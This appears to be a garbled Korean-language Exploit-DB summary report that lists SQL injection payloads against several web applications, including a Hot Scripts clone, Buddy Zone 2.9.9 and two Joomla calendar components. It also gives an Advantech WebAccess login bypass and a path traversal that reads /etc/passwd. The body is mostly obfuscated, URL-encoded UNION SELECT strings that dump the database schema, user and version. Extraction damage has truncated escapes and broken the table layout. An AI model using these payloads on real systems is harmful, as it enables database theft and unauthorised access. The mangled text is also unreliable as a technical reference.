%28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20%65%7 8%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f%2a% 2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6e%74 %28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28%69%6 e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63%6f% 6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74 %5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2 c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6%6d% 65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2f%2a %2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a%2f%2 c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78%33% 30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%32%38 %33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d.0 208-0-28 4395 SQL Injection.0 /pagelist.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38 %38%55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4 c%45%43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33% 3%33%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38 %38%38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%3 3%6%32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45% 28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38 %35%33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%6 5%2c%28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20% 65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f %2a%2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6 e%74%28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28% 69%6e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63 %6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%7 2%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28% 35%2c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6 %6d%65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2 f%2a%2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a% 2f%2c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78 %33%30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%3 2%38%33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d.0

EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 208-0-28 4395 SQL Injection.0 /page_new.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38 %38%55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4 c%45%43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33% 3%33%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38 %38%38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%3 3%6%32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45% 28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38 %35%33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%6 5%2c%28%2f%2a%2%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20% 65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f %2a%2%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6 e%74%28%2a%29%2f%2a%2%30%38%38%38%38%66%72%6f%6d%2a%2f%28% 69%6e%66%6f%72%6d%6%74%69%6f%6e%5f%73%63%68%65%6d%6%2e%63 %6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%7 2%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28% 35%2c%40%2c%2f%2a%2%30%38%38%38%38%74%6%62%6c%65%5f%6e%6 %6d%65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2 f%2a%2%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%6%6d%65%2a% 2f%2c%30%78%6%33%6%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78 %33%30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%3 2%38%33%37%32%39%2c%30%78%32%38%33%38%32%39%29%2d%2d%20%2d.0 208-0-28 4396 SQL Injection Hot s Clone - 'subctid' SQL Injection /categories?keyword=&mctid=[sql]&subctid=- Y2h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+( /*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count( Hot s Clone *)/*!08888from*/(information_schema.columns)where@:=export_ set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*! 08888column_name*/,0xa3a,2)),@,2))--+- Hot s Clone 208-0-28 4397 SQL Injection Multilanguage Real Estate MLM 3.0 - 'srch' SQL Injection /productlist.php?srch=%73%66%64%27%29%20%20%2f%2a%2%30%38%38%38%38 %55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4c%4 5%43%54%2a%2f%20%28%3%29%2c%28%32%29%2c%43%4f%4e%43%4%54% 5f%57%53%28%30%78%32%30%33%6%32%30%2c%55%53%45%52%28%29%2c %44%4%54%4%42%4%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%2 9%29%2c%28%34%29%29%2d%2d%20%2d Multilanguage Real Estate MLM Multilanguag e Real Estate MLM 3.0 208-0-28 4398 SQL Injection Buddy Zone 2.9.9 /chat_im/chat_window.php?request_id=- 55++/*!3337UNION*/+/*!3337SELECT*/+,(Select+export_set( 5,@:=0,(select+count(*)from(information_schema.columns)wher e@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),co lumn_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+- Buddy Zone Buddy Zone 2.9.9 208-0-30 43928 SQL Injection Advantech WebAccess < 8.3 /BWMobileService/BWScadaRest.svc/Login/notadmin'%20or%20'x' %3D'x/nopass/ Advantech WebAccess Advantech WebAccess < 8.3 208-0-30 4393 Joomla! Component Picture Calendar for Joomla 3..4 - /list.php?folder=../../../../etc/passwd Joomla! Component Picture Calendar for Joomla Joomla! Component Picture Calendar for Joomla 3..4 208-0-30 43932 SQL Injection Joomla! Component CP Event Calendar 3.0. - 'id' SQL Injection /index.php?option=com_cpeventcalendar&task=load&id=%2d%3%2 Joomla! 0%20%2f%2a%2%30%36%36%36%36%55%4e%49%4f%4e%2a%2f%20%2f%2a% Component CP Joomla! Component 2%30%36%36%36%36%53%45%4c%45%43%54%2a%2f%20CONCAT_WS(0x203 Event CP Event Calendar a20,user(),database(),version())%2c%32%2c%33%2c%34%2c%35%2c Calendar %36%2c%37%2d%2d%20%2d 3.0. 208-0-30 43933 SQL Injection Joomla! Component Visual Calendar 3..3 - 'id' SQL Injection /index.php?option=com_visualcalendar&view=load&id=- %20%20/*!06666UNION*/%20/*!06666SELECT*/%20(SELECT(@x)FROM (SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEM A.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d674696f6e5f7363 68656d6)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b,4,0x30 ),0x3a20,table_name,0x3c62723e))))x)%2c0x32%2c0x33%2c0x34%2 c0x35%2c0x36%2d%2d%20%2d Joomla! Component Visual Calendar Joomla! Component Visual Calendar 3..3